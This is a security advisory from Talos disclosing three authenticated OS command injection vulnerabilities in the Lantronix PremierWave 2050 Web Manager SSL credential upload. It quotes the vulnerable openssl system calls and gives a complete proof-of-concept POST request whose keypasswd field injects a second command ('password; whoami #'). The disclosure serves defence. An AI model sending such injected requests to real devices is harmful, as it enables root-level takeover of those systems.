Talos IntelligenceTALOS-2021-1314Lantronix PremierWave 2050 Web Manager SSL Credential Upload OS command injection vulnerabilities
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
EPSS
Percentile
42.8%
Summary
Multiple OS command injection vulnerabilities exist in the Web Manager SSL Credential Upload functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.
Tested Versions
Lantronix PremierWave 2050 8.9.0.0R4 (in QEMU)
Product URLs
<https://www.lantronix.com/products/premierwave2050/>
CVSSv3 Score
9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWE
CWE-78 - Improper Neutralization of Special Elements used in an OS Command (โOS Command Injectionโ)
Details
PremierWave 2050 is an embedded Wi-Fi Module manufactured by Lantronix.
Multiple authenticated-by-default command injection vulnerabilities have been found in the Adminstration > SSL > Credentials page of the PremierWave 2050โs โWeb Managerโ web interface. A user-controlled POST parameter submitted to the siteโs /ssl endpoint is injected directly into multiple system calls which are executed with root privileges. In this case, an authenticated attacker controls the keypasswd POST parameter, which undergoes no validation by the server before being injected into various OpenSSL commands.
CVE-2021-21873 - RSA keypasswd Command Injection
The keypasswd parameter will be injected into the below openssl command to decrypt a user-supplied private key as if it were RSA.
snprintf(
cmd,
0x400u,
"openssl rsa -passin pass:%s -in /tmp/ssl_work/key_in.enc -out /tmp/ssl_work/key_in.pem",
elem->value);
system(cmd);
A properly-formatted HTTP request can escape the intended command and execute arbitrary commands with root privileges.
CVE-2021-21874 - DSA keypasswd Command Injection
If the key is not properly decrypted as RSA, then the keypasswd parameter will be injected into the below openssl command to decrypt the private key as if it were DSA.
snprintf(
cmd,
0x400u,
"openssl dsa -passin pass:%s -in /tmp/ssl_work/key_in.enc -out /tmp/ssl_work/key_in.pem",
elem->value);
system(cmd);
A properly-formatted HTTP request can escape the intended command and execute arbitrary commands with root privileges.
CVE-2021-21875 - EC keypasswd Command Injection
If the key is not properly decrypted as DSA, then the keypasswd parameter will be injected into the below openssl command to decrypt the private key as if it were ECDSA.
snprintf(
cmd,
0x400u,
"openssl ec -passin pass:%s -in /tmp/ssl_work/key_in.enc -out /tmp/ssl_work/key_in.pem",
elem->value);
system(cmd);
A properly-formatted HTTP request can escape the intended command and execute arbitrary commands with root privileges.
POST /ssl HTTP/1.1
Host: [IP]:[PORT]
Content-Length: 1109
Cache-Control: max-age=0
Authorization: Basic YnJvd25pZTpwb2ludHM=
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryro8NxaNJXGd9ucKM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundaryro8NxaNJXGd9ucKM
Content-Disposition: form-data; name="sslcredentialname"
Sample
------WebKitFormBoundaryro8NxaNJXGd9ucKM
Content-Disposition: form-data; name="sslcert"; filename="cert.pem"
Content-Type: application/octet-stream
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----
------WebKitFormBoundaryro8NxaNJXGd9ucKM
Content-Disposition: form-data; name="certtypefrom"
pem
------WebKitFormBoundaryro8NxaNJXGd9ucKM
Content-Disposition: form-data; name="certpasswd"
------WebKitFormBoundaryro8NxaNJXGd9ucKM
Content-Disposition: form-data; name="sslkey"; filename="key.pem"
Content-Type: application/octet-stream
-----BEGIN PRIVATE KEY-----
...
-----END PRIVATE KEY-----
------WebKitFormBoundaryro8NxaNJXGd9ucKM
Content-Disposition: form-data; name="keytypefrom"
encrypted-pem
------WebKitFormBoundaryro8NxaNJXGd9ucKM
Content-Disposition: form-data; name="keypasswd"
password; whoami #
------WebKitFormBoundaryro8NxaNJXGd9ucKM
Content-Disposition: form-data; name="uploadcert"
Submit
------WebKitFormBoundaryro8NxaNJXGd9ucKM--
The above HTTP request results in the execution of the following commands, in order:
openssl rsa -passin pass:password; whoami #
openssl dsa -passin pass:password; whoami #
openssl ec -passin pass:password; whoami #
Timeline
2021-06-14 - Vendor Disclosure
2021-06-15 - Vendor acknowledged
2021-09-01 - Talos granted disclosure extension to 2021-10-15
2021-10-18 - Vendor requested release push to 2nd week of November. Talos confirmed final extension and disclosure date
2021-11-15 - Public Release
Related
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
EPSS
Percentile
42.8%